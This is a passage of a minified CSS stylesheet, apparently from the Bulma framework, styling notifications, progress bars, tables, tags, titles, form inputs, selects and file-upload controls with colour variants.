.title{color:currentColor}.notification.is-white{background-color:#fff;color:#0a0a0a}.notification.is-black{background-color:#0a0a0a;color:#fff}.notification.is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.notification.is-dark{background-color:#363636;color:#fff}.notification.is-primary{background-color:#00d1b2;color:#fff}.notification.is-primary.is-light{background-color:#ebfffc;color:#00947e}.notification.is-link{background-color:#485fc7;color:#fff}.notification.is-link.is-light{background-color:#eff1fa;color:#3850b7}.notification.is-info{background-color:#3e8ed0;color:#fff}.notification.is-info.is-light{background-color:#eff5fb;color:#296fa8}.notification.is-success{background-color:#48c78e;color:#fff}.notification.is-success.is-light{background-color:#effaf5;color:#257953}.notification.is-warning{background-color:#ffe08a;color:rgba(0,0,0,.7)}.notification.is-warning.is-light{background-color:#fffaeb;color:#946c00}.notification.is-danger{background-color:#f14668;color:#fff}.notification.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.progress{-moz-appearance:none;-webkit-appearance:none;border:none;border-radius:9999px;display:block;height:1rem;overflow:hidden;padding:0;width:100%}.progress::-webkit-progress-bar{background-color:#ededed}.progress::-webkit-progress-value{background-color:#4a4a4a}.progress::-moz-progress-bar{background-color:#4a4a4a}.progress::-ms-fill{background-color:#4a4a4a;border:none}.progress.is-white::-webkit-progress-value{background-color:#fff}.progress.is-white::-moz-progress-bar{background-color:#fff}.progress.is-white::-ms-fill{background-color:#fff}.progress.is-white:indeterminate{background-image:linear-gradient(to right,#fff 30%,#ededed 30%)}.progress.is-black::-webkit-progress-value{background-color:#0a0a0a}.progress.is-black::-moz-progress-bar{background-color:#0a0a0a}.progress.is-black::-ms-fill{background-color:#0a0a0a}.progress.is-black:indeterminate{background-image:linear-gradient(to right,#0a0a0a 30%,#ededed 30%)}.progress.is-light::-webkit-progress-value{background-color:#f5f5f5}.progress.is-light::-moz-progress-bar{background-color:#f5f5f5}.progress.is-light::-ms-fill{background-color:#f5f5f5}.progress.is-light:indeterminate{background-image:linear-gradient(to right,#f5f5f5 30%,#ededed 30%)}.progress.is-dark::-webkit-progress-value{background-color:#363636}.progress.is-dark::-moz-progress-bar{background-color:#363636}.progress.is-dark::-ms-fill{background-color:#363636}.progress.is-dark:indeterminate{background-image:linear-gradient(to right,#363636 30%,#ededed 30%)}.progress.is-primary::-webkit-progress-value{background-color:#00d1b2}.progress.is-primary::-moz-progress-bar{background-color:#00d1b2}.progress.is-primary::-ms-fill{background-color:#00d1b2}.progress.is-primary:indeterminate{background-image:linear-gradient(to right,#00d1b2 30%,#ededed 30%)}.progress.is-link::-webkit-progress-value{background-color:#485fc7}.progress.is-link::-moz-progress-bar{background-color:#485fc7}.progress.is-link::-ms-fill{background-color:#485fc7}.progress.is-link:indeterminate{background-image:linear-gradient(to right,#485fc7 30%,#ededed 30%)}.progress.is-info::-webkit-progress-value{background-color:#3e8ed0}.progress.is-info::-moz-progress-bar{background-color:#3e8ed0}.progress.is-info::-ms-fill{background-color:#3e8ed0}.progress.is-info:indeterminate{background-image:linear-gradient(to right,#3e8ed0 30%,#ededed 30%)}.progress.is-success::-webkit-progress-value{background-color:#48c78e}.progress.is-success::-moz-progress-bar{background-color:#48c78e}.progress.is-success::-ms-fill{background-color:#48c78e}.progress.is-success:indeterminate{background-image:linear-gradient(to right,#48c78e 30%,#ededed 30%)}.progress.is-warning::-webkit-progress-value{background-color:#ffe08a}.progress.is-warning::-moz-progress-bar{background-color:#ffe08a}.progress.is-warning::-ms-fill{background-color:#ffe08a}.progress.is-warning:indeterminate{background-image:linear-gradient(to right,#ffe08a 30%,#ededed 30%)}.progress.is-danger::-webkit-progress-value{background-color:#f14668}.progress.is-danger::-moz-progress-bar{background-color:#f14668}.progress.is-danger::-ms-fill{background-color:#f14668}.progress.is-danger:indeterminate{background-image:linear-gradient(to right,#f14668 30%,#ededed 30%)}.progress:indeterminate{-webkit-animation-duration:1.5s;animation-duration:1.5s;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite;-webkit-animation-name:moveIndeterminate;animation-name:moveIndeterminate;-webkit-animation-timing-function:linear;animation-timing-function:linear;background-color:#ededed;background-image:linear-gradient(to right,#4a4a4a 30%,#ededed 30%);background-position:top left;background-repeat:no-repeat;background-size:150% 150%}.progress:indeterminate::-webkit-progress-bar{background-color:transparent}.progress:indeterminate::-moz-progress-bar{background-color:transparent}.progress:indeterminate::-ms-fill{animation-name:none}.progress.is-small{height:.75rem}.progress.is-medium{height:1.25rem}.progress.is-large{height:1.5rem}@-webkit-keyframes moveIndeterminate{from{background-position:200% 0}to{background-position:-200% 0}}@keyframes moveIndeterminate{from{background-position:200% 0}to{background-position:-200% 0}}.table{background-color:#fff;color:#363636}.table td,.table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.table td.is-white,.table th.is-white{background-color:#fff;border-color:#fff;color:#0a0a0a}.table td.is-black,.table th.is-black{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.table td.is-light,.table th.is-light{background-color:#f5f5f5;border-color:#f5f5f5;color:rgba(0,0,0,.7)}.table td.is-dark,.table th.is-dark{background-color:#363636;border-color:#363636;color:#fff}.table td.is-primary,.table th.is-primary{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.table td.is-link,.table th.is-link{background-color:#485fc7;border-color:#485fc7;color:#fff}.table td.is-info,.table th.is-info{background-color:#3e8ed0;border-color:#3e8ed0;color:#fff}.table td.is-success,.table th.is-success{background-color:#48c78e;border-color:#48c78e;color:#fff}.table td.is-warning,.table th.is-warning{background-color:#ffe08a;border-color:#ffe08a;color:rgba(0,0,0,.7)}.table td.is-danger,.table th.is-danger{background-color:#f14668;border-color:#f14668;color:#fff}.table td.is-narrow,.table th.is-narrow{white-space:nowrap;width:1%}.table td.is-selected,.table th.is-selected{background-color:#00d1b2;color:#fff}.table td.is-selected a,.table td.is-selected strong,.table th.is-selected a,.table th.is-selected strong{color:currentColor}.table td.is-vcentered,.table th.is-vcentered{vertical-align:middle}.table th{color:#363636}.table th:not([align]){text-align:inherit}.table tr.is-selected{background-color:#00d1b2;color:#fff}.table tr.is-selected a,.table tr.is-selected strong{color:currentColor}.table tr.is-selected td,.table tr.is-selected th{border-color:#fff;color:currentColor}.table thead{background-color:transparent}.table thead td,.table thead th{border-width:0 0 2px;color:#363636}.table tfoot{background-color:transparent}.table tfoot td,.table tfoot th{border-width:2px 0 0;color:#363636}.table tbody{background-color:transparent}.table tbody tr:last-child td,.table tbody tr:last-child th{border-bottom-width:0}.table.is-bordered td,.table.is-bordered th{border-width:1px}.table.is-bordered tr:last-child td,.table.is-bordered tr:last-child th{border-bottom-width:1px}.table.is-fullwidth{width:100%}.table.is-hoverable tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover:nth-child(even){background-color:#f5f5f5}.table.is-narrow td,.table.is-narrow th{padding:.25em .5em}.table.is-striped tbody tr:not(.is-selected):nth-child(even){background-color:#fafafa}.table-container{-webkit-overflow-scrolling:touch;overflow:auto;overflow-y:hidden;max-width:100%}.tags{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.tags .tag{margin-bottom:.5rem}.tags .tag:not(:last-child){margin-right:.5rem}.tags:last-child{margin-bottom:-.5rem}.tags:not(:last-child){margin-bottom:1rem}.tags.are-medium .tag:not(.is-normal):not(.is-large){font-size:1rem}.tags.are-large .tag:not(.is-normal):not(.is-medium){font-size:1.25rem}.tags.is-centered{justify-content:center}.tags.is-centered .tag{margin-right:.25rem;margin-left:.25rem}.tags.is-right{justify-content:flex-end}.tags.is-right .tag:not(:first-child){margin-left:.5rem}.tags.is-right .tag:not(:last-child){margin-right:0}.tags.has-addons .tag{margin-right:0}.tags.has-addons .tag:not(:first-child){margin-left:0;border-top-left-radius:0;border-bottom-left-radius:0}.tags.has-addons .tag:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.tag:not(body){align-items:center;background-color:#f5f5f5;border-radius:4px;color:#4a4a4a;display:inline-flex;font-size:.75rem;height:2em;justify-content:center;line-height:1.5;padding-left:.75em;padding-right:.75em;white-space:nowrap}.tag:not(body) .delete{margin-left:.25rem;margin-right:-.375rem}.tag:not(body).is-white{background-color:#fff;color:#0a0a0a}.tag:not(body).is-black{background-color:#0a0a0a;color:#fff}.tag:not(body).is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.tag:not(body).is-dark{background-color:#363636;color:#fff}.tag:not(body).is-primary{background-color:#00d1b2;color:#fff}.tag:not(body).is-primary.is-light{background-color:#ebfffc;color:#00947e}.tag:not(body).is-link{background-color:#485fc7;color:#fff}.tag:not(body).is-link.is-light{background-color:#eff1fa;color:#3850b7}.tag:not(body).is-info{background-color:#3e8ed0;color:#fff}.tag:not(body).is-info.is-light{background-color:#eff5fb;color:#296fa8}.tag:not(body).is-success{background-color:#48c78e;color:#fff}.tag:not(body).is-success.is-light{background-color:#effaf5;color:#257953}.tag:not(body).is-warning{background-color:#ffe08a;color:rgba(0,0,0,.7)}.tag:not(body).is-warning.is-light{background-color:#fffaeb;color:#946c00}.tag:not(body).is-danger{background-color:#f14668;color:#fff}.tag:not(body).is-danger.is-light{background-color:#feecf0;color:#cc0f35}.tag:not(body).is-normal{font-size:.75rem}.tag:not(body).is-medium{font-size:1rem}.tag:not(body).is-large{font-size:1.25rem}.tag:not(body) .icon:first-child:not(:last-child){margin-left:-.375em;margin-right:.1875em}.tag:not(body) .icon:last-child:not(:first-child){margin-left:.1875em;margin-right:-.375em}.tag:not(body) .icon:first-child:last-child{margin-left:-.375em;margin-right:-.375em}.tag:not(body).is-delete{margin-left:1px;padding:0;position:relative;width:2em}.tag:not(body).is-delete::after,.tag:not(body).is-delete::before{background-color:currentColor;content:"";display:block;left:50%;position:absolute;top:50%;transform:translateX(-50%) translateY(-50%) rotate(45deg);transform-origin:center center}.tag:not(body).is-delete::before{height:1px;width:50%}.tag:not(body).is-delete::after{height:50%;width:1px}.tag:not(body).is-delete:focus,.tag:not(body).is-delete:hover{background-color:#e8e8e8}.tag:not(body).is-delete:active{background-color:#dbdbdb}.tag:not(body).is-rounded{border-radius:9999px}a.tag:hover{text-decoration:underline}.subtitle,.title{word-break:break-word}.subtitle em,.subtitle span,.title em,.title span{font-weight:inherit}.subtitle sub,.title sub{font-size:.75em}.subtitle sup,.title sup{font-size:.75em}.subtitle .tag,.title .tag{vertical-align:middle}.title{color:#363636;font-size:2rem;font-weight:600;line-height:1.125}.title strong{color:inherit;font-weight:inherit}.title:not(.is-spaced)+.subtitle{margin-top:-1.25rem}.title.is-1{font-size:3rem}.title.is-2{font-size:2.5rem}.title.is-3{font-size:2rem}.title.is-4{font-size:1.5rem}.title.is-5{font-size:1.25rem}.title.is-6{font-size:1rem}.title.is-7{font-size:.75rem}.subtitle{color:#4a4a4a;font-size:1.25rem;font-weight:400;line-height:1.25}.subtitle strong{color:#363636;font-weight:600}.subtitle:not(.is-spaced)+.title{margin-top:-1.25rem}.subtitle.is-1{font-size:3rem}.subtitle.is-2{font-size:2.5rem}.subtitle.is-3{font-size:2rem}.subtitle.is-4{font-size:1.5rem}.subtitle.is-5{font-size:1.25rem}.subtitle.is-6{font-size:1rem}.subtitle.is-7{font-size:.75rem}.heading{display:block;font-size:11px;letter-spacing:1px;margin-bottom:5px;text-transform:uppercase}.number{align-items:center;background-color:#f5f5f5;border-radius:9999px;display:inline-flex;font-size:1.25rem;height:2em;justify-content:center;margin-right:1.5rem;min-width:2.5em;padding:.25rem .5rem;text-align:center;vertical-align:top}.input,.select select,.textarea{background-color:#fff;border-color:#dbdbdb;border-radius:4px;color:#363636}.input::-moz-placeholder,.select select::-moz-placeholder,.textarea::-moz-placeholder{color:rgba(54,54,54,.3)}.input::-webkit-input-placeholder,.select select::-webkit-input-placeholder,.textarea::-webkit-input-placeholder{color:rgba(54,54,54,.3)}.input:-moz-placeholder,.select select:-moz-placeholder,.textarea:-moz-placeholder{color:rgba(54,54,54,.3)}.input:-ms-input-placeholder,.select select:-ms-input-placeholder,.textarea:-ms-input-placeholder{color:rgba(54,54,54,.3)}.input:hover,.is-hovered.input,.is-hovered.textarea,.select select.is-hovered,.select select:hover,.textarea:hover{border-color:#b5b5b5}.input:active,.input:focus,.is-active.input,.is-active.textarea,.is-focused.input,.is-focused.textarea,.select select.is-active,.select select.is-focused,.select select:active,.select select:focus,.textarea:active,.textarea:focus{border-color:#485fc7;box-shadow:0 0 0 .125em rgba(72,95,199,.25)}.input[disabled],.select fieldset[disabled] select,.select select[disabled],.textarea[disabled],fieldset[disabled] .input,fieldset[disabled] .select select,fieldset[disabled] .textarea{background-color:#f5f5f5;border-color:#f5f5f5;box-shadow:none;color:#7a7a7a}.input[disabled]::-moz-placeholder,.select fieldset[disabled] select::-moz-placeholder,.select select[disabled]::-moz-placeholder,.textarea[disabled]::-moz-placeholder,fieldset[disabled] .input::-moz-placeholder,fieldset[disabled] .select select::-moz-placeholder,fieldset[disabled] .textarea::-moz-placeholder{color:rgba(122,122,122,.3)}.input[disabled]::-webkit-input-placeholder,.select fieldset[disabled] select::-webkit-input-placeholder,.select select[disabled]::-webkit-input-placeholder,.textarea[disabled]::-webkit-input-placeholder,fieldset[disabled] .input::-webkit-input-placeholder,fieldset[disabled] .select select::-webkit-input-placeholder,fieldset[disabled] .textarea::-webkit-input-placeholder{color:rgba(122,122,122,.3)}.input[disabled]:-moz-placeholder,.select fieldset[disabled] select:-moz-placeholder,.select select[disabled]:-moz-placeholder,.textarea[disabled]:-moz-placeholder,fieldset[disabled] .input:-moz-placeholder,fieldset[disabled] .select select:-moz-placeholder,fieldset[disabled] .textarea:-moz-placeholder{color:rgba(122,122,122,.3)}.input[disabled]:-ms-input-placeholder,.select fieldset[disabled] select:-ms-input-placeholder,.select select[disabled]:-ms-input-placeholder,.textarea[disabled]:-ms-input-placeholder,fieldset[disabled] .input:-ms-input-placeholder,fieldset[disabled] .select select:-ms-input-placeholder,fieldset[disabled] .textarea:-ms-input-placeholder{color:rgba(122,122,122,.3)}.input,.textarea{box-shadow:inset 0 .0625em .125em rgba(10,10,10,.05);max-width:100%;width:100%}.input[readonly],.textarea[readonly]{box-shadow:none}.is-white.input,.is-white.textarea{border-color:#fff}.is-white.input:active,.is-white.input:focus,.is-white.is-active.input,.is-white.is-active.textarea,.is-white.is-focused.input,.is-white.is-focused.textarea,.is-white.textarea:active,.is-white.textarea:focus{box-shadow:0 0 0 .125em rgba(255,255,255,.25)}.is-black.input,.is-black.textarea{border-color:#0a0a0a}.is-black.input:active,.is-black.input:focus,.is-black.is-active.input,.is-black.is-active.textarea,.is-black.is-focused.input,.is-black.is-focused.textarea,.is-black.textarea:active,.is-black.textarea:focus{box-shadow:0 0 0 .125em rgba(10,10,10,.25)}.is-light.input,.is-light.textarea{border-color:#f5f5f5}.is-light.input:active,.is-light.input:focus,.is-light.is-active.input,.is-light.is-active.textarea,.is-light.is-focused.input,.is-light.is-focused.textarea,.is-light.textarea:active,.is-light.textarea:focus{box-shadow:0 0 0 .125em rgba(245,245,245,.25)}.is-dark.input,.is-dark.textarea{border-color:#363636}.is-dark.input:active,.is-dark.input:focus,.is-dark.is-active.input,.is-dark.is-active.textarea,.is-dark.is-focused.input,.is-dark.is-focused.textarea,.is-dark.textarea:active,.is-dark.textarea:focus{box-shadow:0 0 0 .125em rgba(54,54,54,.25)}.is-primary.input,.is-primary.textarea{border-color:#00d1b2}.is-primary.input:active,.is-primary.input:focus,.is-primary.is-active.input,.is-primary.is-active.textarea,.is-primary.is-focused.input,.is-primary.is-focused.textarea,.is-primary.textarea:active,.is-primary.textarea:focus{box-shadow:0 0 0 .125em rgba(0,209,178,.25)}.is-link.input,.is-link.textarea{border-color:#485fc7}.is-link.input:active,.is-link.input:focus,.is-link.is-active.input,.is-link.is-active.textarea,.is-link.is-focused.input,.is-link.is-focused.textarea,.is-link.textarea:active,.is-link.textarea:focus{box-shadow:0 0 0 .125em rgba(72,95,199,.25)}.is-info.input,.is-info.textarea{border-color:#3e8ed0}.is-info.input:active,.is-info.input:focus,.is-info.is-active.input,.is-info.is-active.textarea,.is-info.is-focused.input,.is-info.is-focused.textarea,.is-info.textarea:active,.is-info.textarea:focus{box-shadow:0 0 0 .125em rgba(62,142,208,.25)}.is-success.input,.is-success.textarea{border-color:#48c78e}.is-success.input:active,.is-success.input:focus,.is-success.is-active.input,.is-success.is-active.textarea,.is-success.is-focused.input,.is-success.is-focused.textarea,.is-success.textarea:active,.is-success.textarea:focus{box-shadow:0 0 0 .125em rgba(72,199,142,.25)}.is-warning.input,.is-warning.textarea{border-color:#ffe08a}.is-warning.input:active,.is-warning.input:focus,.is-warning.is-active.input,.is-warning.is-active.textarea,.is-warning.is-focused.input,.is-warning.is-focused.textarea,.is-warning.textarea:active,.is-warning.textarea:focus{box-shadow:0 0 0 .125em rgba(255,224,138,.25)}.is-danger.input,.is-danger.textarea{border-color:#f14668}.is-danger.input:active,.is-danger.input:focus,.is-danger.is-active.input,.is-danger.is-active.textarea,.is-danger.is-focused.input,.is-danger.is-focused.textarea,.is-danger.textarea:active,.is-danger.textarea:focus{box-shadow:0 0 0 .125em rgba(241,70,104,.25)}.is-small.input,.is-small.textarea{border-radius:2px;font-size:.75rem}.is-medium.input,.is-medium.textarea{font-size:1.25rem}.is-large.input,.is-large.textarea{font-size:1.5rem}.is-fullwidth.input,.is-fullwidth.textarea{display:block;width:100%}.is-inline.input,.is-inline.textarea{display:inline;width:auto}.input.is-rounded{border-radius:9999px;padding-left:calc(calc(.75em - 1px) + .375em);padding-right:calc(calc(.75em - 1px) + .375em)}.input.is-static{background-color:transparent;border-color:transparent;box-shadow:none;padding-left:0;padding-right:0}.textarea{display:block;max-width:100%;min-width:100%;padding:calc(.75em - 1px);resize:vertical}.textarea:not([rows]){max-height:40em;min-height:8em}.textarea[rows]{height:initial}.textarea.has-fixed-size{resize:none}.checkbox,.radio{cursor:pointer;display:inline-block;line-height:1.25;position:relative}.checkbox input,.radio input{cursor:pointer}.checkbox:hover,.radio:hover{color:#363636}.checkbox input[disabled],.checkbox[disabled],.radio input[disabled],.radio[disabled],fieldset[disabled] .checkbox,fieldset[disabled] .radio{color:#7a7a7a;cursor:not-allowed}.radio+.radio{margin-left:.5em}.select{display:inline-block;max-width:100%;position:relative;vertical-align:top}.select:not(.is-multiple){height:2.5em}.select:not(.is-multiple):not(.is-loading)::after{border-color:#485fc7;right:1.125em;z-index:4}.select.is-rounded select{border-radius:9999px;padding-left:1em}.select select{cursor:pointer;display:block;font-size:1em;max-width:100%;outline:0}.select select::-ms-expand{display:none}.select select[disabled]:hover,fieldset[disabled] .select select:hover{border-color:#f5f5f5}.select select:not([multiple]){padding-right:2.5em}.select select[multiple]{height:auto;padding:0}.select select[multiple] option{padding:.5em 1em}.select:not(.is-multiple):not(.is-loading):hover::after{border-color:#363636}.select.is-white:not(:hover)::after{border-color:#fff}.select.is-white select{border-color:#fff}.select.is-white select.is-hovered,.select.is-white select:hover{border-color:#f2f2f2}.select.is-white select.is-active,.select.is-white select.is-focused,.select.is-white select:active,.select.is-white select:focus{box-shadow:0 0 0 .125em rgba(255,255,255,.25)}.select.is-black:not(:hover)::after{border-color:#0a0a0a}.select.is-black select{border-color:#0a0a0a}.select.is-black select.is-hovered,.select.is-black select:hover{border-color:#000}.select.is-black select.is-active,.select.is-black select.is-focused,.select.is-black select:active,.select.is-black select:focus{box-shadow:0 0 0 .125em rgba(10,10,10,.25)}.select.is-light:not(:hover)::after{border-color:#f5f5f5}.select.is-light select{border-color:#f5f5f5}.select.is-light select.is-hovered,.select.is-light select:hover{border-color:#e8e8e8}.select.is-light select.is-active,.select.is-light select.is-focused,.select.is-light select:active,.select.is-light select:focus{box-shadow:0 0 0 .125em rgba(245,245,245,.25)}.select.is-dark:not(:hover)::after{border-color:#363636}.select.is-dark select{border-color:#363636}.select.is-dark select.is-hovered,.select.is-dark select:hover{border-color:#292929}.select.is-dark select.is-active,.select.is-dark select.is-focused,.select.is-dark select:active,.select.is-dark select:focus{box-shadow:0 0 0 .125em rgba(54,54,54,.25)}.select.is-primary:not(:hover)::after{border-color:#00d1b2}.select.is-primary select{border-color:#00d1b2}.select.is-primary select.is-hovered,.select.is-primary select:hover{border-color:#00b89c}.select.is-primary select.is-active,.select.is-primary select.is-focused,.select.is-primary select:active,.select.is-primary select:focus{box-shadow:0 0 0 .125em rgba(0,209,178,.25)}.select.is-link:not(:hover)::after{border-color:#485fc7}.select.is-link select{border-color:#485fc7}.select.is-link select.is-hovered,.select.is-link select:hover{border-color:#3a51bb}.select.is-link select.is-active,.select.is-link select.is-focused,.select.is-link select:active,.select.is-link select:focus{box-shadow:0 0 0 .125em rgba(72,95,199,.25)}.select.is-info:not(:hover)::after{border-color:#3e8ed0}.select.is-info select{border-color:#3e8ed0}.select.is-info select.is-hovered,.select.is-info select:hover{border-color:#3082c5}.select.is-info select.is-active,.select.is-info select.is-focused,.select.is-info select:active,.select.is-info select:focus{box-shadow:0 0 0 .125em rgba(62,142,208,.25)}.select.is-success:not(:hover)::after{border-color:#48c78e}.select.is-success select{border-color:#48c78e}.select.is-success select.is-hovered,.select.is-success select:hover{border-color:#3abb81}.select.is-success select.is-active,.select.is-success select.is-focused,.select.is-success select:active,.select.is-success select:focus{box-shadow:0 0 0 .125em rgba(72,199,142,.25)}.select.is-warning:not(:hover)::after{border-color:#ffe08a}.select.is-warning select{border-color:#ffe08a}.select.is-warning select.is-hovered,.select.is-warning select:hover{border-color:#ffd970}.select.is-warning select.is-active,.select.is-warning select.is-focused,.select.is-warning select:active,.select.is-warning select:focus{box-shadow:0 0 0 .125em rgba(255,224,138,.25)}.select.is-danger:not(:hover)::after{border-color:#f14668}.select.is-danger select{border-color:#f14668}.select.is-danger select.is-hovered,.select.is-danger select:hover{border-color:#ef2e55}.select.is-danger select.is-active,.select.is-danger select.is-focused,.select.is-danger select:active,.select.is-danger select:focus{box-shadow:0 0 0 .125em rgba(241,70,104,.25)}.select.is-small{border-radius:2px;font-size:.75rem}.select.is-medium{font-size:1.25rem}.select.is-large{font-size:1.5rem}.select.is-disabled::after{border-color:#7a7a7a}.select.is-fullwidth{width:100%}.select.is-fullwidth select{width:100%}.select.is-loading::after{margin-top:0;position:absolute;right:.625em;top:.625em;transform:none}.select.is-loading.is-small:after{font-size:.75rem}.select.is-loading.is-medium:after{font-size:1.25rem}.select.is-loading.is-large:after{font-size:1.5rem}.file{align-items:stretch;display:flex;justify-content:flex-start;position:relative}.file.is-white .file-cta{background-color:#fff;border-color:transparent;color:#0a0a0a}.file.is-white.is-hovered .file-cta,.file.is-white:hover .file-cta{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.file.is-white.is-focused .file-cta,.file.is-white:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(255,255,255,.25);color:#0a0a0a}.file.is-white.is-active .file-cta,.file.is-white:active .file-cta{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.file.is-black .file-cta{background-color:#0a0a0a;border-color:transparent;color:#fff}.file.is-black.is-hovered .file-cta,.file.is-black:hover .file-cta{background-color:#040404;border-color:transparent;color:#fff}.file.is-black.is-focused .file-cta,.file.is-black:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(10,10,10,.25);color:#fff}.file.is-black.is-active .file-cta,.file.is-black:active .file-cta{background-color:#000;border-color:transparent;color:#fff}.file.is-light .file-cta{background-color:#f5f5f5;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-light.is-hovered .file-cta,.file.is-light:hover .file-cta{background-color:#eee;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-light.is-focused .file-cta,.file.is-light:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(245,245,245,.25);color:rgba(0,0,0,.7)}.file.is-light.is-active .file-cta,.file.is-light:active .file-cta{background-color:#e8e8e8;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-dark .file-cta{background-color:#363636;border-color:transparent;color:#fff}.file.is-dark.is-hovered .file-cta,.file.is-dark:hover .file-cta{background-color:#2f2f2f;border-color:transparent;color:#fff}.file.is-dark.is-focused .file-cta,.file.is-dark:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(54,54,54,.25);color:#fff}.file.is-dark.is-active .file-cta,.file.is-dark:active .file-cta{background-color:#292929;border-color:transparent;color:#fff}.file.is-primary .file-cta{background-color:#00d1b2;border-color:transparent;color:#fff}.file.is-primary.is-hovered .file-cta,.file.is-primary:hover .file-cta{background-color:#00c4a7;border-color:transparent;color:#fff}.file.is-primary.is-focused .file-cta,.file.is-primary:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(0,209,178,.25);color:#fff}.file.is-primary.is-active .file-cta,.file.is-primary:active .file-cta{background-color:#00b89c;border-color:transparent;color:#fff}.file.is-link .file-cta{background-color:#485fc7;border-color:transparent;color:#fff}.file.is-link.is-hovered .file-cta,.file.is-link:hover .file-cta{background-color:#3e56c4;border-color:transparent;color:#fff}.file.is-link.is-focused .file-cta,.file.is-link:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(72,95,199,.25);color:#fff}.file.is-link.is-active .file-cta,.file.is-link:active .file-cta{background-color:#3a51bb;border-color:transparent;color:#fff}.file.is-info .file-cta{background-color:#3e8ed0;border-color:transparent;color:#fff}.file.is-info.is-hovered .file-cta,.file.is-info:hover .file-cta{background-color:#3488ce;border-color:transparent;color:#fff}.file.is-info.is-focused .file-cta,.file.is-info:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(62,142,208,.25);color:#fff}.file.is-info.is-active .file-cta,.file.is-info:active .file-cta{background-color:#3082c5;border-color:transparent;color:#fff}.file.is-success .file-cta{background-color:#48c78e;border-color:transparent;color:#fff}.file.is-success.is-hovered .file-cta,.file.is-success:hover .file-cta{background-color:#3ec487;border-color:transparent;color:#fff}.file.is-success.is-focused .file-cta,.file.is-success:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(72,199,142,.25);color:#fff}.file.is-success.is-active .file-cta,.file.is-success:active .file-cta{background-color:#3abb81;border-color:transparent;color:#fff}.file.is-warning .file-cta{background-color:#ffe08a;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-warning.is-hovered .file-cta,.file.is-warning:hover .file-cta{background-color:#ffdc7d;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-warning.is-focused .file-cta,.file.is-warning:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(255,224,138,.25);color:rgba(0,0,0,.7)}.file.is-warning.is-active .file-cta,.file.is-warning:active .file-cta{background-color:#ffd970;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-danger .file-cta{background-color:#f14668;border-color:transparent;color:#fff}.file.is-danger.is-hovered .file-cta,.file.is-danger:hover .file-cta{background-color:#f03a5f;border-color:transparent;color:#fff}.file.is-danger.is-focused .file-cta,.file.is-danger:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(241,70,104,.25);color:#fff}.file.is-danger.is-active .file-cta,.file.is-danger:active .file-cta{background-color:#ef2e55;border-color:transparent;color:#fff}.file.is-small{font-size:.75rem}.file.is-normal{font-size:1rem}.file.is-medium{font-size:1.25rem}.file.is-medium .file-icon .fa{font-size:21px}.file.is-large{font-size:1.5rem}.file.is-large .file-icon .fa{font-size:28px}.file.has-name .file-cta{border-bottom-right-radius:0;border-top-right-radius:0}.file.has-name .file-name{border-bottom-left-radius:0;border-top-left-radius:0}.file.has-name.is-empty .file-cta{border-radius:4px}.file.has-name.is-empty .file-name{display:none}.file.is-boxed .file-label{flex-direction:column}.file.is-boxed .file-cta{flex-direction:column;height:auto;padding:1em 3em}.file.is-boxed .file-name{border-width:0 1px 1px}.file.is-boxed .file-icon{height:1.5em;width:1.5em}.file.is-boxed .file-icon .fa{font-size:21px}.file.is-boxed.is-small .file-icon .fa{font-size:14px}.file.is-boxed.is-medium .file-icon .fa{font-size:28px}.file.is-boxed.is-large .file-icon .fa{font-size:35px}.file.is-boxed.has-name .file-cta{border-radius:4px 4px 0 0}.file.is-boxed.has-name .file-name{border-radius:0 0 4px 4px;border-width:0 1px 1px}.file.is-centered{justify-content:center}.file.is-fullwidth .file-label{width:100%}.file.is-fullwidth .file-name{flex-grow:1;max-width:none}.file.is-right{justify-content:flex-end}.file.is-right .file-cta{border-radius:0 4px 4px 0}.file.is-right .file-name{border-radius:4px 0 0 4px;border-width:1px 0 1px 1px;order:-1}.file-label{align-items:stretch;display:flex;cursor:pointer;justify-content:flex-start;overflow:hidden;position:relative}.file-label:hover .file-cta{background-color:#eee;color:#363636}.file-label:hover .file-name{border-color:#d5d5d5}.file-label:active .file-cta{background-color:#e8e8e8;color:#363636}.file-label:active .file-name{border-color:#cfcfcf}.file-input{height:100%;left:0;opacity:0;outline:0;position:absolute;top:0;width:100%}.file-cta,.file-name{border-color:#dbdbdb;border-radius:4px;font-size:1em;padding-left:1em;padding-right:1em;white-space:nowrap}.file-cta{background-color:#f5f5f5;color:#4a4a4a}.file-name{border-color:#dbdbdb;border-style:solid;border-width:1px 1px 1px 0;display:block;max-width:16em;overflow:hidden;text-align:inherit;text-overflow:ellipsis}.file-icon{align-items:center;display:flex;height:1em;justify-content:center;margin-right:.5em;width:1em}.file-icon 